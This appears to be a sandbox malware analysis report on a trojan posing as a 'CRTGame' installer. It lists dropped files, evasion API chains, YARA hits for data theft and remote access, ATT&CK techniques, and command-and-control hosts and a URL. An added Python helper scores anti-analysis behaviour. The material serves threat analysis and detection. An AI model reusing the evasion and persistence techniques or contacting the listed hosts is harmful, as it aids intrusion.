                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-NFQ3O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-OMTUV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FLPRF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-M9NVL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-DSQCO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-THT99.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-N90RR.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-US51G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-89IOF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-9BPGE.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exe | Evasive API call chain: GetSystemTime,DecisionNodes (graph_0-5687)
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_7-15169)
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 5376 | Thread sleep count: 225 > 30
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 5376 | Thread sleep time: -450000s >= -30000s
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 5540 | Thread sleep count: 43 > 30
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 5540 | Thread sleep time: -2580000s >= -30000s
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 5376 | Thread sleep count: 9675 > 30
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 5376 | Thread sleep time: -19350000s >= -30000s
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | File opened: PhysicalDrive0
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_004520C0 FindFirstFileA,GetLastError
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exe | Code function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Thread delayed: delay time: 60000
                  Source: crtgame.exe, 00000007.00000002.3303589391.0000000000837000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3303589391.00000000008C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exe | API call chain: ExitProcess graph end node (graph_0-6727)
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | API call chain: ExitProcess graph end node (graph_5-2159)
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | API call chain: ExitProcess graph end node (graph_5-2399)
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | API call chain: ExitProcess graph end node (graph_7-15170)
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 7_2_02BDFBBE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 7_2_02BC5F14 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,GetTickCount,_memset,wsprintfA,_memset,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 7_2_02BD8F28 SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00476FAC ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle
                  Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 7_2_02BD7A6D cpuid
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exe | Code function: 0_2_004051FC GetLocaleInfoA
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exe | Code function: 0_2_00405248 GetLocaleInfoA
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00408570 GetLocaleInfoA
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_004085BC GetLocaleInfoA
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00457CE8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exe | Code function: 0_2_004026C4 GetSystemTime
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00454AB8 GetUserNameA
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exe | Code function: 0_2_00405CE4 GetVersionExA
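A triage helper, added here as an example and not part of the Joe Sandbox report or of Joe Security's tooling: it parses behaviour lines in the layout used in this section ("Source: <path> ... <signature>: <detail>", with or without a separator between path and signature) and scores each source binary for the anti-analysis and privilege-check behaviour the lines describe (sleep loops above the report's own 30-call threshold, IsDebuggerPresent/OutputDebugString, cpuid, raw PhysicalDrive access, and the AllocateAndInitializeSid + CheckTokenMembership pair, which is the classic Administrators-group membership test). The tag names and weights are this example's assumptions, and the embedded sample lines are a constructed subset of the lines above.

```python
"""Score Joe Sandbox style behaviour lines for anti-analysis behaviour.

Added example; not Joe Sandbox code.  Tag names, weights and the mapping
from API names to tags are assumptions of this example.
"""
from __future__ import annotations

import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*(?:\|\s*)?"
    r"(?P<kind>Thread sleep count|Thread sleep time|File opened|"
    r"Code function|Evasive API call chain):\s*(?P<detail>.*)$"
)
TID_RE = re.compile(r"\s*TID:\s*(\d+)$")
FUNC_ID_RE = re.compile(r"^(\d+_\d+_[0-9A-Fa-f]+)\s+")   # e.g. 7_2_02BD7A6D
GRAPH_RE = re.compile(r"\s*\(?graph_[\w-]+\)?\s*$")        # trailing graph id

SLEEP_COUNT_THRESHOLD = 30            # the threshold the report itself prints
API_TAGS = {                          # assumed API -> tag mapping
    "debugger_check": {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
                       "OutputDebugStringA", "OutputDebugStringW"},
    "cpuid": {"cpuid"},
    "time_check": {"GetSystemTime", "GetTickCount", "QueryPerformanceCounter"},
    "file_enum": {"FindFirstFileA", "FindFirstFileW"},
}
# Build a SID, then ask whether the token holds it: the usual "am I admin" check.
ADMIN_CHECK_CHAIN = ("AllocateAndInitializeSid", "CheckTokenMembership")
WEIGHTS = {"sleep_loop": 2, "debugger_check": 2, "raw_disk": 3,
           "admin_check": 1, "cpuid": 1, "time_check": 1, "file_enum": 0}

# Constructed sample: a subset of the report's lines, in the section's layout.
SAMPLE_LINES = [
    r"Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 5376 | Thread sleep count: 225 > 30",
    r"Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 5376 | Thread sleep time: -450000s >= -30000s",
    r"Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 5376 | Thread sleep count: 9675 > 30",
    r"Source: C:\Program Files (x86)\CRTGame\crtgame.exe | File opened: PhysicalDrive0",
    r"Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 7_2_02BDFBBE RtlEncodePointer,LoadLibraryExW,GetLastError,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,7_2_02BDFBBE",
    r"Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 7_2_02BD7A6D cpuid 7_2_02BD7A6D",
    r"Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042DFC4",
    r"Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08",
    r"Source: C:\Users\user\Desktop\j9htknb7BQ.exe | Evasive API call chain: GetSystemTime,DecisionNodes (graph_0-5687)",
]


def split_apis(detail: str) -> list[str]:
    """'7_2_X A,B,7_2_X' or 'A,B (graph_0-1)' -> ['A', 'B']."""
    detail = GRAPH_RE.sub("", detail)
    m = FUNC_ID_RE.match(detail)
    if m:                                  # drop leading id and its trailing repeat
        func_id = m.group(1)
        detail = re.sub(r",?\s*" + re.escape(func_id) + r"\s*$", "", detail[m.end():])
    return [a.strip() for a in detail.split(",") if a.strip()]


def parse_line(line: str) -> dict | None:
    """One behaviour line -> record, or None if the line is not a signature line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src, tid = m.group("src"), None
    t = TID_RE.search(src)
    if t:                                   # "<path> TID: 5376" -> path + thread id
        tid, src = int(t.group(1)), src[: t.start()]
    kind, detail = m.group("kind"), m.group("detail").strip()
    apis = split_apis(detail) if kind in ("Code function", "Evasive API call chain") else []
    return {"source": src, "tid": tid, "kind": kind, "detail": detail, "apis": apis}


def analyze(lines) -> dict[str, dict]:
    """Aggregate per source binary: tags, total sleep calls, APIs seen, and a score."""
    acc = defaultdict(lambda: {"tags": set(), "sleep_calls": 0, "sleep_time": 0, "apis": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        f = acc[rec["source"]]
        kind, detail, apis = rec["kind"], rec["detail"], rec["apis"]
        if kind == "Thread sleep count":            # "225 > 30"
            n = int(detail.split()[0])
            f["sleep_calls"] += n
            if n > SLEEP_COUNT_THRESHOLD:
                f["tags"].add("sleep_loop")
        elif kind == "Thread sleep time":           # "-450000s >= -30000s": keep magnitude as reported
            f["sleep_time"] += abs(int(detail.split()[0].rstrip("s")))
        elif kind == "File opened":
            if detail.upper().startswith("PHYSICALDRIVE"):
                f["tags"].add("raw_disk")
        else:                                       # Code function / Evasive API call chain
            f["apis"].update(apis)
            for tag, names in API_TAGS.items():
                if names & set(apis):
                    f["tags"].add(tag)
            if all(a in apis for a in ADMIN_CHECK_CHAIN):
                f["tags"].add("admin_check")
    return {src: {"tags": sorted(v["tags"]), "sleep_calls": v["sleep_calls"],
                  "sleep_time": v["sleep_time"], "apis": sorted(v["apis"]),
                  "score": sum(WEIGHTS[t] for t in v["tags"])}
            for src, v in acc.items()}


if __name__ == "__main__":
    for src, r in sorted(analyze(SAMPLE_LINES).items(), key=lambda kv: -kv[1]["score"]):
        print(f"{r['score']:>2}  {src}\n    tags={r['tags']} sleep_calls={r['sleep_calls']}")
```

Run as a script it ranks the three binaries in the sample, with crtgame.exe (sleep loop, raw disk handle, debugger check, cpuid) at the top; to use it on a full report, feed every line of the Evasion/Anti-Analysis section to `analyze` and triage from the highest score down.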

                  Stealing of Sensitive Information

                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-VNLOG.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-QRNOQ.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-M6FGJ.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-PA44V.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-OMTUV.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-L2U9S.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-V4Q5G.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-KVRT3.tmp, type: DROPPED
                  Source: Yara match | File source: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.3304521371.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: crtgame.exe PID: 5460, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-VNLOG.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-QRNOQ.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-M6FGJ.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-PA44V.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-OMTUV.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-L2U9S.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-V4Q5G.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-KVRT3.tmp, type: DROPPED
                  Source: Yara match | File source: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.3304521371.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: crtgame.exe PID: 5460, type: MEMORYSTR
                  MITRE ATT&CK Matrix

                  Techniques with at least one matching signature, grouped by tactic; the number in parentheses is the signature count the report assigns to the technique.

                  Execution: Native API (3), Scheduled Task/Job (1), Service Execution (2)
                  Persistence: DLL Side-Loading (1), Windows Service (4), Scheduled Task/Job (1), Bootkit (1)
                  Privilege Escalation: Exploitation for Privilege Escalation (1), DLL Side-Loading (1), Access Token Manipulation (1), Windows Service (4), Process Injection (12), Scheduled Task/Job (1)
                  Defense Evasion: Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (23), DLL Side-Loading (1), Masquerading (1), Virtualization/Sandbox Evasion (21), Access Token Manipulation (1), Process Injection (12), Bootkit (1)
                  Discovery: System Time Discovery (1), Account Discovery (1), File and Directory Discovery (1), System Information Discovery (35), Security Software Discovery (41), Virtualization/Sandbox Evasion (21), Application Window Discovery (11), System Owner/User Discovery (3), Remote System Discovery (1), System Network Configuration Discovery (1)
                  Collection: Archive Collected Data (1)
                  Command and Control: Ingress Tool Transfer (2), Encrypted Channel (2), Non-Standard Port (1), Non-Application Layer Protocol (2), Application Layer Protocol (112)
                  Impact: System Shutdown/Reboot (1)

                  No technique matched under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement or Exfiltration.
Behavior Graph (ID: 1575008, Sample: j9htknb7BQ.exe, Start date: 14/12/2024, Architecture: WINDOWS, Score: 100), reconstructed from the flattened graph:

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus / Scanner detection for submitted sample; 9 other signatures

Process tree:
• j9htknb7BQ.exe (started)
  • dropped: C:\Users\user\AppData\...\j9htknb7BQ.tmp, PE32
  • j9htknb7BQ.tmp (started)
    • dropped: C:\Program Files (x86)\CRTGame\crtgame.exe, PE32
    • dropped: C:\Program Files (x86)\...\is-PA44V.tmp, PE32
    • dropped: C:\Program Files (x86)\...\is-L2U9S.tmp, PE32
    • dropped: 106 other files (none is malicious)
    • signature: Uses schtasks.exe or at.exe to add and modify task schedules
    • crtgame.exe (started)
      • DNS/IP: bhdmpwg.com 94.232.249.187, 49788, 49805, 49808, INT-PDN-STE-ASSTEPDNInternalASSY, Syrian Arab Republic
      • DNS/IP: 46.8.225.74, 2023, 49795, 49807, FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics, Russian Federation
    • net.exe (started)
      • conhost.exe (started)
      • net1.exe (started)
    • crtgame.exe (started, second instance)
      • dropped: C:\ProgramData\SpaceXRaces\SpaceXRaces.exe, PE32
    • schtasks.exe (started)
      • conhost.exe (started)
Source | Detection | Scanner | Label
j9htknb7BQ.exe | 39% | ReversingLabs | Win32.Trojan.Munp
j9htknb7BQ.exe | 58% | Virustotal | -
j9htknb7BQ.exe | 100% | Avira | HEUR/AGEN.1332570
Source | Detection | Scanner
C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy) | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy) | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy) | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy) | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy) | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy) | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy) | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-0B8UA.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-0H0B1.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-15Q83.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-15SLJ.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-1GFJF.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-1L7JU.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-2DM26.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-4L1QL.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-53LMN.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-6AF6U.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-768F1.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-7M8GD.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-89IOF.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-8KTA3.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-9BPGE.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-DSQCO.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-FLPRF.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-I69V3.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-J4G02.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-KJFHV.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-KVRT3.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-L2U9S.tmp | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-LCCKT.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-LKN3T.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-M6FGJ.tmp | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-M9NVL.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-MGR1O.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-N90RR.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-NFQ3O.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-NTP22.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-O2JHA.tmp | 0% | ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde2 | 0% | Avira URL Cloud | safe
